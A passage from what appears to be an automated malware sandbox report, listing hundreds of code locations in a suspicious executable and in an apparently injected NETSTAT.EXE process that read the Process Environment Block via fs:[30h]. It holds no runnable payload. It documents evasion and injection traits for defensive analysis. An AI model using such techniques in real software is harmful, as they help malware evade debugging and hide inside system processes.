          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03871B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03871B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03935BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03893B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03893B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03878A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03883A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03934015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03934015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03880050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03880050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03922073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03931074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03878794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0393070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0393070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03864F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03864F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03898E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03921608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03892581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0389FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0389FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038935A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]
